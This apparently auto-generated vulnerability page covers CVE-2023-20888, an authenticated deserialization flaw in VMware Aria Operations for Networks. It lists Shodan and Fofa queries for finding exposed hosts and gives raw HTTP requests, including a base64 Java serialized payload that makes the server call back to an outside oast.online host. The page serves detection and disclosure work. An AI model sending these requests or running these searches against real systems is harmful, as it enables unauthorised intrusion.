| Title | VMware Aria Operations for Networks - Remote Code Execution |
|---|---|
| Author | iamnoooob,rootxharsh,pdresearch |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Apply the latest security patches or updates provided by VMware to mitigate this vulnerability. |
| CVSS Score | 8.8 |
| EPSS Score | 0.90925 |
| CVE ID | CVE-2023-20888 |
| CWE ID | CWE-502 |
| Shodan Query | title:"VMware Aria Operations"http.title:"vmware vrealize network insight"http.title:"vmware aria operations" |
| Fofa Query | title="vmware vrealize network insight"title="vmware aria operations" |
| Tags | cve2023 cve vmware aria rce authenticated oast vuln |
Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid ‘member’ role credentials may be able to perform a deserialization attack resulting in remote code execution.
POST /api/auth/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.25 (KHTML, like Gecko) Version/3.2 Safari/525.25
Connection: close
Content-Length: 64
Content-Type: application/json;charset=UTF-8
X-Vrni-Csrf-Token: null
Accept-Encoding: gzip
{"username":"HcBHMt","password":"scW3jT","domain":"localdomain"}
POST /api/events/push-notifications HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Connection: close
Content-Length: 474
Content-Type: application/json
X-Vrni-Csrf-Token: BZD8l7
Accept-Encoding: gzip
{"endOffset": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QALWQ1amtpOWhsZTBvNHRkMGtlMHNnam5jdHhyZmllYXBqei5vYXN0Lm9ubGluZXQAAHEAfgAFdAAEaHR0cHB4dAA0aHR0cDovL2Q1amtpOWhsZTBvNHRkMGtlMHNnam5jdHhyZmllYXBqei5vYXN0Lm9ubGluZXg= "}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-20888.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-20888.pcap
N/AN/A